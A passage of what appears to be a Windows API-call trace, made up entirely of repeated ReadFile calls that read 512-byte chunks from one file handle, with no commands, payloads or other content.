lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile 
(in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 
[0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, 
lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, 
lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: 
lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, 
lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, 
lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile 
(in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.834] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.834] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.834] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 
[0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, 